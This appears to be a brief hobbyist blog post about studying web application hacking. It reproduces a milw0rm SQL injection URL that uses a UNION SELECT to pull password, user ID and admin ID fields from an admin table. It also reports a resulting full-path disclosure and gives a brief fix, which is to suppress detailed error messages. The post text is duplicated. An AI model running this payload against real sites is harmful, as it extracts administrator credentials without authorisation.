Hmm.. Its been quite a while since I'm been playing with these stuff. Actually during this Ramadhan.. I'm quite tired to do this hacking stuff.
For a couple of weeks I'm been reading the old version of Hacking Exposed Web Application..eventhough its old, but it provides a strong doundation and understanding in 'hacking' and securing your web applications.
Tested a bug from milworm, more sql injections :) The actual script from milworm is like this :
index.php?action=readmore&id=-1%20union%20select%200,1,concat(passwd,0x3a,userid,0x3a,adminid),3%20from%20admin/*
Change it a bit, and I got full path disclosure :) Nice.
Well the countermeasures : Do not be very kind to display those 'hacker's friendly' error/warning message. Do your own custom message to obfucaste the real one. Hihhihi
For a couple of weeks I'm been reading the old version of Hacking Exposed Web Application..eventhough its old, but it provides a strong doundation and understanding in 'hacking' and securing your web applications.
Tested a bug from milworm, more sql injections :) The actual script from milworm is like this :
index.php?action=readmore&id=-1%20union%20select%200,1,concat(passwd,0x3a,userid,0x3a,adminid),3%20from%20admin/*
Change it a bit, and I got full path disclosure :) Nice.
Well the countermeasures : Do not be very kind to display those 'hacker's friendly' error/warning message. Do your own custom message to obfucaste the real one. Hihhihi
1 comments:
http://bprdanapos.com/ :)